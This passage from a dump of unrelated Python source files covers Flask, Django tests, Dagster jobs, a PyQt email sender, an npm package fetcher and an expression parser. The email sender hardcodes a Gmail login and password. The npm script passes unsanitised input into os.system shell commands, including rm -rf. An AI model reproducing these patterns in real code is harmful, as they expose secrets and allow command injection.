filter to jinja templating\n@app.template_filter('datetime')\ndef format_datetime(value, format='medium'):\n if format == 'full':\n format=\"EEEE, d. MMMM y 'at' HH:mm\"\n elif format == 'medium':\n format=\"EE dd.MM.y HH:mm\"\n return dates.format_datetime(value, format)\n\n@app.template_filter('date')\ndef format_datetime(value, format='medium'):\n if format == 'full':\n format=\"EEEE, d. MMMM y\"\n elif format == 'medium':\n format=\"EE dd.MM.y\"\n return dates.format_datetime(value, format)\n\n# Make user availible easily in the global var\n@app.before_request\ndef before_request():\n g.user = current_user\n\n# tell the session manager how to access the user object\n@lm.user_loader\ndef user_loader(id):\n return User.objects.get(id=id)\n\nfrom weekly import views, models\n\n# check to make sure our desired majors are in the database\nfor major, key in data.majors:\n models.Major.objects.get_or_create(key=key, text=major)\n# check to make sure our desired majors are in the database\nfor team in data.teams:\n models.Team.objects.get_or_create(text=team)\n","sub_path":"weekly/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497263775","text":"import unittest\nfrom .choice import Choice\n\n\nclass TestChoice(Choice):\n FIRST = 1, \"zed\"\n SECOND = 2\n THIRD = 3\n FOURTH = 4, \"a description\"\n WITH_UNDERSCORE = 5\n MORE_VALUES = 6, \"another description\"\n\n\nclass TestChoiceInheritance(TestChoice):\n EXTRA_VALUE = 7\n pass\n\n\nclass TestChoiceOrdered(TestChoice):\n ZED = 7, \"zzzzzzzzz\"\n _order_by = \"name\"\n\n\nclass TestCustomOrdering(Choice):\n LAST = ('last', 'Last', 10)\n FIRST = ('first', 'First', 1)\n\n @staticmethod\n def _get_sort_key(value):\n return value[2]\n\n\nclass TestCustomOrderingInheritance(TestCustomOrdering):\n MIDDLE = ('middle', 'Middle', 5)\n\n\nclass TestSimple(Choice):\n OTHER = 10\n\n\nclass TestMultipleInheritance(TestChoice, TestSimple):\n pass\n\n\ndef get_name_from_choices(value, choices):\n for id, name in choices:\n if id == value:\n return name\n\n\nclass TestChoices(unittest.TestCase):\n def testInstance(self):\n self.failUnlessEqual(list(TestChoice()), list(TestChoice))\n self.failUnlessEqual(list(TestChoiceOrdered()), list(TestChoiceOrdered))\n self.failUnlessEqual(list(TestChoiceInheritance()), list(TestChoiceInheritance))\n\n def testInheritance(self):\n self.failUnlessEqual(list(TestChoiceInheritance)[:-1], list(TestChoice))\n\n def testNames(self):\n fourth_name = get_name_from_choices(TestChoice.FOURTH, list(TestChoice))\n self.failUnlessEqual(fourth_name, \"a description\")\n\n underscore_name = get_name_from_choices(TestChoice.WITH_UNDERSCORE, list(TestChoice))\n self.failUnlessEqual(underscore_name, \"With Underscore\")\n\n self.failUnlessEqual(TestChoice.GetByName(\"a description\"), TestChoice.FOURTH)\n self.failUnlessEqual(TestChoice.GetByValue(TestChoice.FOURTH), fourth_name)\n\n def testOrderBy(self):\n self.failIfEqual(list(TestChoice), list(TestChoiceOrdered))\n self.failUnless(list(TestChoiceOrdered)[-1][0] == TestChoiceOrdered.ZED)\n self.failUnlessEqual(list(TestChoice)[0][0], TestChoice.FIRST)\n\n def testCustomOrdering(self):\n self.assertEqual(list(TestCustomOrdering)[0][0], TestCustomOrdering.FIRST)\n self.assertEqual(list(TestCustomOrdering)[-1][0], TestCustomOrdering.LAST)\n self.assertEqual(list(TestCustomOrderingInheritance)[0][0], TestCustomOrdering.FIRST)\n self.assertEqual(list(TestCustomOrderingInheritance)[-1][0], TestCustomOrdering.LAST)\n\n def testMultipleInheritance(self):\n self.assertEqual(list(TestMultipleInheritance), list(TestChoice) + list(TestSimple))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"django_choice_object/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321577999","text":"from pytube import YouTube\nfrom tkinter.filedialog import *\nfrom tkinter.messagebox import *\nfrom tkinter import *\nfrom threading import *\nfont = ('verdana', 20)\nfile_size= 0\ndef completeDownload (stream = None, file_path =None):\n print(\"download completed\")\n showinfo(\"Message\", \"File has been downloaded...\")\n db['text']= \"Download Video\"\n db['state'] = \"active\"\n urlfield.delete(0,END)\ndef progressDownload(stream = None, chunck= None,bytes_remaining = None):\n per = (100*(file_size-bytes_remaining)/file_size)\n db['text']= \"{:00.0f}% downloaded \" .format(per)\ndef btnclick():\n try :\n db['text']= 'Please Wait....'\n db['state']= 'disable'\n url =urlfield.get()\n if url=='':\n return\n print(url)\n thread =Thread(target=down, args=(url,))\n\n thread.start()\n except EXCEPTION as e:\n print(e)\ndef down(url):\n global file_size\n path = askdirectory()\n if path is None:\n return\n try:\n yt =YouTube(url)\n st =yt.streams.first()\n yt.register_on_complete_callback(completeDownload)\n yt.register_on_progress_callback(progressDownload)\n file_size = st.filesize\n st.download(output_path=path)\n showinfo(\"Message\", \"File has been downloaded...\")\n except Exception as e:\n print(e)\nroot = Tk()\nroot.title(\"Sneha's Youtube Downloader\")\nroot.geometry(\"500x600\")\nphoto = PhotoImage(file = \"yotube.png\")\nheadingIcon = Label(root, image = photo)\nheadingIcon.pack(side = TOP ,pady = 3)\nurlfield = Entry(root,font= font,justify = CENTER)\nurlfield.pack(side = TOP,fill = X,padx = 10)\nurlfield.focus()\ndb = Button(root,text = \"start download\", font= font,relief = 'ridge', command = btnclick)\ndb.pack(side = TOP, pady = 20)\n\nroot.mainloop()\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"432214173","text":"from typing import AbstractSet, Any, Optional\n\nfrom dagster import (\n InputDefinition,\n ResourceDefinition,\n SolidDefinition,\n repository,\n schedule,\n sensor,\n solid,\n)\nfrom dagster.core.definitions.decorators.graph import graph\n\n\ndef make_solid(\n name: str,\n required_resource_keys: Optional[AbstractSet[str]] = None,\n config_schema: Optional[Any] = None,\n num_inputs: int = 0,\n) -> SolidDefinition:\n @solid(\n name=name,\n input_defs=[InputDefinition(f\"input{i}\") for i in range(num_inputs)],\n required_resource_keys=required_resource_keys,\n config_schema=config_schema,\n )\n def _solid(_, **_kwargs):\n return None\n\n return _solid\n\n\n@graph\ndef event_tables():\n \"\"\"A graph with no resources\"\"\"\n make_raw_events = make_solid(\"make_raw_events\")\n clean_events = make_solid(\"clean_events\", num_inputs=1)\n\n raw_events = make_raw_events()\n clean_events(raw_events)\n\n\n@schedule(job=event_tables, cron_schedule=\"0 0 * * *\")\ndef event_tables_schedule(_):\n return {}\n\n\n@graph\ndef event_reports():\n make_event_reports = make_solid(\"make_event_reports\", required_resource_keys={\"mode\"})\n make_event_reports()\n\n\n@sensor(job=event_reports.to_job(resource_defs={\"mode\": ResourceDefinition.none_resource()}))\ndef event_reports_sensor():\n pass\n\n\nevent_reports_dev = event_reports.to_job(resource_defs={\"mode\": ResourceDefinition.none_resource()})\n\n\n@graph\ndef crm_ingest():\n \"\"\"A graph with multiple production jobs\"\"\"\n ingest_users = make_solid(\"ingest_users\", required_resource_keys={\"crm\"})\n ingest_interactions = make_solid(\"ingest_interactions\", required_resource_keys={\"crm\"})\n\n ingest_users()\n ingest_interactions()\n\n\ncrm_ingest_dev = crm_ingest.to_job(resource_defs={\"crm\": ResourceDefinition.none_resource()})\n\n\n@schedule(\n job=crm_ingest.to_job(\n name=\"crm_ingest_instance1\", resource_defs={\"crm\": ResourceDefinition.none_resource()}\n ),\n cron_schedule=\"0 0 * * *\",\n)\ndef crm_ingest_instance1_schedule(_):\n return {}\n\n\n@schedule(\n job=crm_ingest.to_job(\n name=\"crm_ingest_instance2\", resource_defs={\"crm\": ResourceDefinition.none_resource()}\n ),\n cron_schedule=\"0 0 * * *\",\n)\ndef crm_ingest_instance2_schedule(_):\n return {}\n\n\n@graph\ndef content_recommender_training():\n \"\"\"A graph with a production job, but no schedule\"\"\"\n build_user_features = make_solid(\"build_user_features\")\n build_item_features = make_solid(\"build_item_features\")\n train_model = make_solid(\"train_model\", required_resource_keys={\"mlflow\"}, num_inputs=2)\n evaluate_model = make_solid(\"evaluate_model\", num_inputs=1)\n\n evaluate_model(train_model(input0=build_user_features(), input1=build_item_features()))\n\n\ncontent_recommender_training_dev = content_recommender_training.to_job(\n resource_defs={\"mlflow\": ResourceDefinition.none_resource()}\n)\n\ncontent_recommender_training_prod = content_recommender_training.to_job(\n resource_defs={\"mlflow\": ResourceDefinition.none_resource()}\n)\n\n\n@graph\ndef process_customer_data_dump():\n \"\"\"Customer success managers run this pipeline for a particular customers when those customers\n have data to upload.\"\"\"\n process_customer = make_solid(\"process_customer\", config_schema={\"customer_id\": str})\n process_customer()\n\n\nprocess_customer_data_dump_dev = process_customer_data_dump.to_job(\n config={\"solids\": {\"process_customer\": {\"config\": {\"customer_id\": \"test_customer\"}}}}\n)\n\n\n@repository\ndef graph_job_dev_repo():\n return [\n event_tables,\n event_reports_dev,\n crm_ingest_dev,\n content_recommender_training_dev,\n process_customer_data_dump_dev,\n ]\n\n\n@repository\ndef graph_job_prod_repo():\n return [\n event_tables_schedule,\n event_reports_sensor,\n crm_ingest_instance1_schedule,\n crm_ingest_instance2_schedule,\n content_recommender_training_prod,\n process_customer_data_dump,\n ]\n","sub_path":"python_modules/dagster-test/dagster_test/toys/graph_job_repos.py","file_name":"graph_job_repos.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"27667384","text":"import requests\nimport os\nfrom twilio.rest import Client\n\naccount_sid = os.environ.get(\"TWILIO_SID\")\nauth_token = os.environ.get(\"TWILIO_TOKEN\")\nclient = Client(account_sid, auth_token)\ntwilio_number = os.environ.get(\"TWILIO_NUMBER\")\nmy_number = os.environ.get(\"MY_NUMBER\")\n\nLATITUDE = -22.338930\nLONGITUDE = -49.055190\n\napi_key = os.environ.get(\"OWM_API_KEY\")\napi_url = \"https://api.openweathermap.org/data/2.5/onecall\"\nparams = {\n \"lat\": LATITUDE,\n \"lon\": LONGITUDE,\n \"exclude\": \"current,minutely,daily,alerts\",\n \"appid\": api_key\n}\n\nresponse = requests.get(api_url, params=params)\nresponse.raise_for_status()\n\ndata = response.json()\n\nfor hourly_data in data[\"hourly\"][:12]:\n condition_code = hourly_data[\"weather\"][0][\"id\"]\n if condition_code < 700:\n message = client.messages.create(\n body=\"It's gonna rain! Don't forget to bring an ☔\",\n from_=twilio_number,\n to=my_number\n )\n break\n","sub_path":"Day035/Lectures/lec04.py","file_name":"lec04.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"555083870","text":"import torch\nimport tensorflow as tf\nfrom transformers import BertTokenizer, BertForMultipleChoice\nimport pandas as pd\nimport nltk\n\n\nchoice_list = pd.read_csv('./data/sorted_cats.csv', header=None)[0].sample(6).to_list()\nprint(choice_list)\ncate_dic = {k: v for k, v in enumerate(choice_list)}\nprint(cate_dic)\n\nprint(len(choice_list))\ntesting_data = pd.read_csv('./data/new_cat_list_3match_results.csv', usecols=[2,3,6]).sample(7)\nprint(testing_data)\nprint(len(testing_data))\n\ntext_list = testing_data['Abstract'].to_list()\n\nmodel_name = 'emilyalsentzer/Bio_ClinicalBERT'\ntokenizer = BertTokenizer.from_pretrained(model_name)\nmodel = BertForMultipleChoice.from_pretrained(model_name)\n\ndef get_prompt_list(prompt):\n prompt_list = []\n for i in range(len(choice_list)):\n prompt_list.append(prompt)\n return prompt_list\n\ndef num2cat_dic(indices_list):\n map_cat = []\n for ind in indices_list:\n cat_value = cate_dic[ind]\n map_cat.append(cat_value)\n\n return map_cat\n\n\n\n\nprint('============== start getting results =================')\nprediction_list = []\nfor prompt in text_list:\n print('prompt')\n print(prompt)\n\n prompt_list = get_prompt_list(prompt)\n encoding = tokenizer(prompt_list, choice_list, return_tensors='pt', padding=True)\n outputs = model(**{k: v.unsqueeze(0) for k, v in encoding.items()}) # batch size is 1, , labels=labels\n\n # labels = torch.tensor(0).unsqueeze(0)\n\n assert len(prompt_list)==len(choice_list)\n\n print('encoding')\n print(encoding)\n outputs = model(**{k: v.unsqueeze(0) for k, v in encoding.items()}) # batch size is 1, , labels=labels\n\n # the linear classifier still needs to be trained\n #loss = outputs[0]\n logits = outputs[0] # shape (1, sorted_cates)\n np_logits = logits.detach().numpy()\n tf_logits = tf.convert_to_tensor(np_logits)\n\n values, indices = tf.nn.top_k(tf_logits, 5)\n\n indices = indices.numpy().flatten() #numpy.ndarray\n cate = num2cat_dic(indices)\n prediction_list.append(cate)\n\ntesting_data['prediction'] = prediction_list\n\n\n\ntesting_data.to_csv('./data/testing_results.csv')\n\n","sub_path":"testing_run.py","file_name":"testing_run.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389201141","text":"import math\n\n\nclass UpdatesScheduler:\n def __init__(self):\n self.counter = 0\n\n def schedule(self, max_game_duration, action_duration, mode, max_games, update_cycles, update_interval, config):\n update_list = [22000, 1000, 1000, 1000, 1000, 1000, 1000]\n total_update_cycles = config['Experiment'][mode]['total_update_cycles']\n online_updates = 0\n if config['Experiment']['online_updates']:\n online_updates = max_game_duration / action_duration * (\n max_games - config['Experiment'][mode]['start_training_step_on_game'])\n\n if update_cycles is None:\n update_cycles = total_update_cycles - online_updates\n\n if config['Experiment']['scheduling'] == \"descending\":\n self.counter += 1\n if not (math.ceil(max_games / update_interval) == self.counter):\n update_cycles /= 2\n\n elif config['Experiment']['scheduling'] == \"big_first\":\n if config['Experiment']['online_updates']:\n if self.counter == 1:\n update_cycles = update_list[self.counter]\n else:\n update_cycles = 0\n else:\n update_cycles = update_list[self.counter]\n\n self.counter += 1\n\n else:\n update_cycles = (total_update_cycles - online_updates) / math.ceil(\n max_games / update_interval)\n\n return math.ceil(update_cycles)\n","sub_path":"game/updates_scheduler.py","file_name":"updates_scheduler.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475405310","text":"import sys\r\nfrom PyQt5.QtWidgets import QWidget , QPushButton , QApplication , QLineEdit , QLabel , QPlainTextEdit , QMessageBox , QGridLayout , QListWidget\r\nfrom PyQt5.QtGui import QIcon , QFont\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nimport sqlite3\r\nimport datetime\r\n\r\n\r\nclass Show_window(QWidget):\r\n def __init__( self ):\r\n QWidget.__init__( self )\r\n\r\n def init_ui( self,some_text):\r\n self.setWindowTitle( 'База отправленных сообщений' )\r\n self.setFixedSize( 900 , 900 )\r\n self.move( 900 , 100 )\r\n self.setStyleSheet( 'background-color: rgb(24, 48, 73);color: honeydew;' )\r\n self.setWindowIcon( QIcon( 'startup_rocket_spaceship_launch_business_icon_191142 (1).png' ) )\r\n self.text_for_lineedit = QLabel( self )\r\n self.text_for_lineedit.move( 5 , 10 )\r\n self.some_text = some_text\r\n print(self.some_text)\r\n self.text_for_lineedit.setText(self.some_text)\r\n self.text_for_lineedit.setStyleSheet('background-color: rgb(255,255,255);color:black;margin-left:25px;font-size:25px;')\r\n\r\n def set_name( self ,some_text ):\r\n self.some_text = some_text\r\n print(self.some_text)\r\n\r\n\r\nclass Data_window( QWidget ):\r\n def __init__( self ):\r\n QWidget.__init__( self )\r\n self.init_ui()\r\n\r\n def init_ui( self ):\r\n # -----------------------\r\n self.conn = sqlite3.connect( 'orders.db' )\r\n self.cur = self.conn.cursor()\r\n self.setWindowTitle( 'База отправленных сообщений' )\r\n self.setFixedSize( 500 , 500 )\r\n self.move( 900 , 100 )\r\n self.setStyleSheet( 'background-color: rgb(24, 48, 73);color: honeydew;' )\r\n self.setWindowIcon( QIcon( 'startup_rocket_spaceship_launch_business_icon_191142 (1).png' ) )\r\n # -----------------------\r\n self.cur.execute( \"SELECT to_email FROM sended_emails;\" )\r\n self.emails_data = self.cur.fetchall()\r\n self.cur.execute( \"SELECT message FROM sended_emails;\")\r\n self.messages_for_emails = self.cur.fetchall()\r\n self.cur.execute(\"SELECT text_data_and_time FROM sended_emails;\")\r\n self.times = self.cur.fetchall()\r\n # -----------------------\r\n layout = QGridLayout()\r\n self.setLayout( layout )\r\n self.listwidget = QListWidget()\r\n count = 0\r\n for i in zip(self.emails_data,self.times):\r\n for j in i :\r\n print(j[0])\r\n check = ''\r\n for emails in zip(self.emails_data,self.times):\r\n for items in emails:\r\n check += items[0] + ' '\r\n self.listwidget.insertItem(count ,check )\r\n check = ''\r\n count+= 1\r\n self.listwidget.clicked.connect(self.on_click_db)\r\n layout.addWidget( self.listwidget )\r\n self.text_base = []\r\n for i in self.messages_for_emails:\r\n self.text_base.append(i[0])\r\n print(self.text_base)\r\n def on_click_db( self ):\r\n item = self.listwidget.currentIndex()\r\n print(self.text_base[item.row()])\r\n self.window_3 = Show_window()\r\n self.window_3.init_ui(self.text_base[item.row()])\r\n self.window_3.show()\r\n\r\nclass App( QWidget ):\r\n def __init__( self ):\r\n super( QWidget , self ).__init__()\r\n self.app = QApplication( sys.argv )\r\n self.init_ui()\r\n\r\n def init_ui( self ):\r\n # -----------------------\r\n self.window_2 = Data_window()\r\n # -----------------------\r\n self.conn = sqlite3.connect( 'orders.db' )\r\n self.cur = self.conn.cursor()\r\n self.cur.execute( \"\"\"CREATE TABLE IF NOT EXISTS sended_emails(\r\n to_email TEXT,\r\n message TEXT,\r\n text_data_and_time TEXT);\r\n \"\"\" )\r\n self.conn.commit()\r\n # -----------------------\r\n self.setFixedSize( 400 , 800 )\r\n self.move( 500 , 100 )\r\n self.setStyleSheet( 'background-color: rgb(24, 48, 73);color: honeydew;' )\r\n # -----------------------\r\n self.text_for_lineedit = QLabel( self )\r\n self.text_for_lineedit.move( 5 , 10 )\r\n self.text_for_lineedit.setText( 'Введите Email : ' )\r\n self.text_for_lineedit.setStyleSheet( \"\" )\r\n self.text_for_lineedit.setFont( QFont( 'Bitter' , 10 ) )\r\n # -----------------------\r\n self.textbox = QLineEdit( self )\r\n self.textbox.move( 5 , 40 )\r\n self.textbox.resize( 390 , 40 )\r\n self.textbox.setStyleSheet( 'background-color: rgb(184, 205, 228);'\r\n 'color: rgb(37, 16, 37);'\r\n 'font-size: 22px;' )\r\n # -----------------------\r\n self.plain_text = QPlainTextEdit( self )\r\n self.plain_text.insertPlainText( 'Введите сюда своё сообщение (╯°□°)╯︵ ┻━┻' )\r\n self.plain_text.resize( 390 , 500 )\r\n self.plain_text.move( 5 , 100 )\r\n self.holder_for_text = [ ]\r\n self.plain_text.textChanged.connect(\r\n lambda: self.holder_for_text.append( self.plain_text.document().toPlainText() ) )\r\n self.plain_text.setStyleSheet( 'background-color: rgb(184, 205, 228);'\r\n 'color: rgb(37, 16, 37);'\r\n 'font-size: 22px;' )\r\n # -----------------------\r\n self.push_button_submit = QPushButton( \"Отправить сообщение\" , self )\r\n self.push_button_submit.resize( 390 , 55 )\r\n self.push_button_submit.move( 0 , 740 )\r\n self.push_button_submit.setStyleSheet( \"background-color: rgb(155, 155, 155);\"\r\n \"color:black;\"\r\n \"text-align: center;\"\r\n \"border: 1px solid rgb(0, 0, 0);margin-left:5px;\" )\r\n self.push_button_submit.clicked.connect( self.on_click_send )\r\n # -----------------------\r\n self.button_to_db = QPushButton( 'Перейти в базу данных' , self )\r\n self.button_to_db.resize( 390 , 55 )\r\n self.button_to_db.move( 0 , 640 )\r\n self.button_to_db.setStyleSheet( \"background-color: rgb(155, 155, 155);\"\r\n \"color:black;\"\r\n \"text-align: center;\"\r\n \"border: 1px solid rgb(0, 0, 0); margin-left:5px;\" )\r\n\r\n self.button_to_db.clicked.connect( self.change_to_db_window )\r\n # -----------------------\r\n self.setWindowTitle( 'Отправка сообщений' )\r\n self.setWindowIcon( QIcon( 'startup_rocket_spaceship_launch_business_icon_191142 (1).png' ) )\r\n self.show()\r\n\r\n def on_click_send( self ):\r\n print( \"pustota\" )\r\n if self.textbox.text() is None or self.holder_for_text[ -1 ] is None or self.textbox.text() == '':\r\n print( \"Пустые поля\" )\r\n else:\r\n self.push_button_submit.setStyleSheet( \"background-color: rgb(255,255,255);\"\r\n \"color:black;\"\r\n \"text-align: center;\"\r\n \"border: 1px solid rgb(0, 0, 0);\" )\r\n # -----------------------\r\n addr_from = \"testovicht12@gmail.com\"\r\n addr_to = self.textbox.text()\r\n password = \"testovicht12123\"\r\n msg = MIMEMultipart()\r\n # -----------------------\r\n msg[ 'From' ] = addr_from\r\n msg[ 'To' ] = addr_to\r\n msg[ 'Subject' ] = 'Сообщение с приложения!'\r\n # -----------------------\r\n body = self.holder_for_text[ -1 ]\r\n msg.attach( MIMEText( body , 'plain' ) )\r\n server = smtplib.SMTP( 'smtp.gmail.com' , 587 )\r\n # -----------------------\r\n server.starttls()\r\n server.login( addr_from , password )\r\n server.send_message( msg )\r\n server.quit()\r\n # -----------------------\r\n message_for_user = QMessageBox( self )\r\n message_for_user.setWindowTitle( \"Успешная отправка\" )\r\n message_for_user.setText( \"Сообщение успешно отправлено \" )\r\n message_for_user.setIcon( QMessageBox.Information )\r\n\r\n message_for_user.setStandardButtons( QMessageBox.Cancel | QMessageBox.Ok )\r\n message_for_user.setDefaultButton( QMessageBox.Ok )\r\n\r\n message_for_user.setDetailedText(\r\n \"Вы можете просмотерть все отправленные сообщнеия в дополнительной вкладке , в основном меню\" )\r\n message_for_user.setInformativeText(\r\n \"Сообщение было отправленно на почту : \" + self.textbox.text() + '.Пожалуйста,перепроверьте почту.' )\r\n x = message_for_user.exec_()\r\n holder = (addr_to , body , datetime.datetime.now())\r\n # print( holder )\r\n self.cur.execute( \"SELECT * FROM sended_emails;\" )\r\n # print( self.cur.fetchall() )\r\n self.cur.execute( \"INSERT INTO sended_emails VALUES (?,?,?);\" , holder )\r\n self.conn.commit()\r\n\r\n def change_to_db_window( self ):\r\n print( \"Сработала функция изменения окна\" )\r\n\r\n self.window_2.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n ex = QApplication( sys.argv )\r\n app = App()\r\n sys.exit( ex.exec_() )\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201615688","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport os\nimport sys\n\ndef makePackageDir():\n try:\n packages_path = os.path.join(\".\", \"packages\")\n os.system(\"rm -rf {}\".format(packages_path))\n os.mkdir(packages_path)\n except:\n pass\n\ndef getCacheDir():\n return os.path.join(os.environ[\"HOME\"], \".npm\")\n\ndef cleanCache():\n print(\"[+] Clearing local npm cache\")\n os.system(\"rm -rf {}\".format(os.path.join(getCacheDir(), \"*\")))\n\ndef installPackage(package):\n if os.path.exists(package):\n with open(package) as f:\n packages = f.read().split(\"\\n\")[::-1]\n for p in packages:\n if p != \"\":\n print(\"[+] Installing {}...\".format(p))\n os.system(\"npm install {}\".format(p))\n else:\n print(\"[+] Installing {}...\".format(p))\n os.system(\"npm install {}\".format(package))\n\ndef generateProgetPackage():\n print(\"[+] Copying packages to ./packages\")\n for root, dirs, files in os.walk(getCacheDir()):\n for f in files:\n if \"package.tgz\" == f:\n package_file = os.path.join(root, f)\n dest_file = os.path.join(\".\",\"packages\", \"{}-{}.tgz\".format(os.path.basename(os.path.dirname(root)), os.path.basename(root)))\n cmd = \"cp {} {}\".format(package_file, dest_file)\n os.system(cmd)\n\nif __name__ == \"__main__\":\n makePackageDir()\n cleanCache()\n installPackage(sys.argv[1])\n\n if len(sys.argv) == 3 and sys.argv[2] == \"dev\":\n generateDevPackage()\n else:\n generateProgetPackage()\n\n cleanCache()\n\n","sub_path":"old_version/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"482331361","text":"\"\"\"\nThis script is the main file that calls all the other\nscripts to run the ml project.\n\"\"\"\n\nimport pandas as pd\nimport src.config as sc\n\nfrom sklearn import model_selection\nfrom src.model_dispatcher import model\nfrom src.param_grid import parameter_grid\n\n\ndef run_output(df):\n \"\"\"\n Structure, train and save the model\n for given fold number.\n\n Args:\n df (pd.DataFrame): training dataset\n\n Returns:\n\n \"\"\"\n features = [i for i in df.columns if i != 'price_range']\n X = df[features].values\n y = df['price_range'].values\n\n \"\"\"\n We can also use RandomizedSearchCV, \n where we randomly select a combination\n of parameters and run cross validation,\n time consumed will be less than grid search\n as we do not train on all combinations, one more\n parameter in it is n_iter, if it is less it will take less\n time than grid searrch if it is high, it will take more time\n \"\"\"\n clf = model_selection.GridSearchCV(\n estimator=model,\n param_grid=parameter_grid,\n scoring='accuracy',\n verbose=10, # higher value of it just means that lot of information will be printed\n n_jobs=1,\n cv=5\n )\n\n \"\"\"fit model on the training data\"\"\"\n clf.fit(X, y)\n\n print(f'Best score is : {clf.best_score_}')\n best_parameters = clf.best_estimator_.get_params()\n print('Best Parameters Set:')\n for prm in parameter_grid.keys():\n print(f'\\t {prm} : {best_parameters[prm]}')\n\n return clf\n\n\nif __name__ == '__main__':\n df = pd.read_csv(sc.TRAINING_FILE)\n run_output(df)\n","sub_path":"run_main.py","file_name":"run_main.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632449096","text":"\nfrom config import Config\nimport json\nfrom tools import MySQLDB, Encoder, CantorishInitBaseDeltaUpdater\nfrom queries import queryMap\nimport logging\nimport logging.handlers\nimport os,sys\nimport getopt\n\nscript_path = os.path.dirname(os.path.abspath(__file__))\nenv = 'default'\nconfig_file = script_path+'/simple.cfg'\nrange = 64\nbatch_size = 1000\n\nopts, args = getopt.getopt(sys.argv[1:], 'e:c:i:p:t:b:', ['env=', 'conf=', 'batch_size=', 'range='])\n\nfor k, v in opts:\n if k in (\"-e\", \"--env\"):\n env = v\n elif k in (\"-c\", \"--conf\"):\n config_file = v\n elif k in (\"-b\", \"-batch_size\"):\n batch_size = int(v)\n elif k in (\"-r\", \"-range\"):\n range = int(v)\n\nlogger = logging.getLogger('etl_cantorish')\nlogger.setLevel(logging.INFO)\nLOG_FILENAME = \"/tmp/etl.cantorish_init_base.%s.delta.log\"%env\nhandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=100000000, backupCount=5)\nhandler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\nlogger.addHandler(handler)\n\npid = str(os.getpid())\npidfile = \"/tmp/etl.cantorish_init_base.%s.delta.pid\"%env\n\nif os.path.isfile(pidfile):\n logger.warn( \"%s already exists, exiting\" % pidfile )\n sys.exit()\n\nfile(pidfile, 'w').write(pid)\n\ntry:\n cfg = Config(file(config_file))[env]\n db_source = MySQLDB(cfg['db']['source'])\n db_target = MySQLDB(cfg['db']['management'])\n deltaUpdater = CantorishInitBaseDeltaUpdater(db_source, db_target, queryMap, range)\n deltaUpdater.streamDelta(batch_size)\n \n db_source.close()\n db_target.close()\nexcept:\n logger.error(\"exception: %s\"%str(sys.exc_info()))\n raise \nfinally:\n os.unlink(pidfile)\n\n","sub_path":"cantorish/init_base_delta.py","file_name":"init_base_delta.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233120018","text":"import sys\ndigits = '0123456789.'\noperators = '+-*'\nparens = '()'\n\n\"\"\"\nParses a list of tokens EXPLST, returning a tuple where the first element is\nit's evaluation.\n\"\"\"\ndef parse(explst):\n first = explst[0]\n rest = explst[1:]\n if first == '(':\n left, newlist = parse(rest)\n operator = newlist[0]\n right, toss = parse(newlist[1:])\n return eval(left, operator, right), toss[1:]\n return first, rest\n\n\"\"\"\nTakes numerical types L and R and applies function that OPERATOR represents\n\"\"\"\ndef eval(l, operator, r):\n left = float(l)\n right = float(r)\n if operator == '+':\n return left + right\n elif operator == '-':\n return left - right\n elif operator == '*':\n return left * right\n else:\n print(\"ERROR, invalid op: \" + operator)\n exit()\n\n\"\"\"\nReceives a parenthesized arithmetic expression LINE and returns it's evaluation.\n\"\"\"\ndef driver(line):\n holder = []\n cleaned = line.replace(' ', '')\n for c in cleaned:\n if c in parens or c in operators:\n holder.append(c)\n elif c in digits:\n if len(holder) == 0 or not (holder[-1][0] in digits):\n holder.append(c)\n else:\n holder[-1] = holder[-1] + c\n else:\n return \"Invalid Input: \" + line\n\n try:\n return parse(holder)[0]\n except IndexError:\n return \"Invalid Input: \" + line\n\n\ndef main():\n for i in range(1, len(sys.argv)):\n print(driver(sys.argv[i]))\n print(\"\\nExample Tests: \")\n print(\"Input: '(521+3)' ... Expected: 524 ... Got: \" + str(driver(\"(521+3)\")))\n print(\"Input: '(4-2)' ... Expected: 2 ... Got: \" + str(driver(\"(4-2)\")))\n print(\"Input: '((4-2)+(3*2))' ... Expected: 8 ... Got: \" + str(driver(\"((4-2)+(3*2))\")))\n print(\"Input: '((1+(3*2))-4)' ... Expected: 3 ... Got: \" + str(driver(\"((1+(3*2))-4)\")))\n print(\"Input: '3' ... Expected: 3 ... Got: \" + str(driver(\"3\")))\n print(\"Input: '(5.6+2.4)' ... Expected: 8 ... Got: \" + str(driver(\"(5.6+2.4)\")))\n print(str(driver(\"(6)\")))\n print(driver('bill'))\n print(driver('(bill-bill)'))\n\nif __name__== \"__main__\":\n 